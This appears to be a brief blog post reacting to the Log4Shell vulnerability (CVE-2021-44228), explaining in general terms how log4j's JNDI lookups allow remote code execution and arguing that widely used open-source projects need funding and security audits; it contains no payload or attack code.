______Digital Wonder

CVE-2021-44228

RDev -

Yesterday the world knew about a new critical vulnerability, affecting millions of production boxes, using one of the most popular and widely used libraries for logging in the Java / JVM world.

This was uncovered by Chen Zhaojun, from Alibaba. There's plenty of technical information already available, so I won't extend on that.

Summarising, it's basically an exploit on a log4j feature that enables lookups, for instance, to resolve a server name only known at runtime. A malicious user can send a log message to the server with a template like the one below for the log4j library to be evaluated; that server can host a class file opening a remote terminal that the client can use to control the host machine.

This would be the original go-to link for information: https://www.randori.com/blog/cve-2021-44228/

This will probably cause a lot of pain, for a number of reasons; not the vulnerability itself, but also a chain of events that broaden its impact.

  • JNDI Lookup feature is enabled by default
  • Vulnerability allows for RCE (Remote Code Execution) on servers running log4j2 (I can't think of a library used more frequently in the Java world).
  • Any application that can supply arbitrary data written to log files can be exploited.
  • A new version with a fix (will be 2.15) hasn't still been released, half a month after the issue was reported; that's quite a long time; there's probably a reason why this happened, and this is probably because it is a community maintained project.
  • An early fixed was developed, but it added some other vulnerabilities spotted by security experts, so the fix needed to wait.
  • Apache project didn't seemingly trigger any emergency warning, even when the vulnerability was published and could be exploited maliciously (for instance via Ransomware attacks).
  • There should probably be a process in place guaranteeing that software used widely gets audited properly and exhaustively; and there should also be an economic incentive for this.
  • Developers are doing a great job building awesome tools like log4j in their spare time; however, they don't live out of thin air and their effort should be compensated, not only via donations, but through a mechanism that strengths controls; specially in a time where attacking and exploiting 0-Days is so profitable for cyber criminals (Ransomware).
  • This could also be a wake up call to foundations maintaining free software (as in free speech) so they start to incorporate economic incentives in the software lifecycle that prevent all this pain, and increase their reactivity, not if, but  when a new vulnerability is found (bug hunting, security audits..)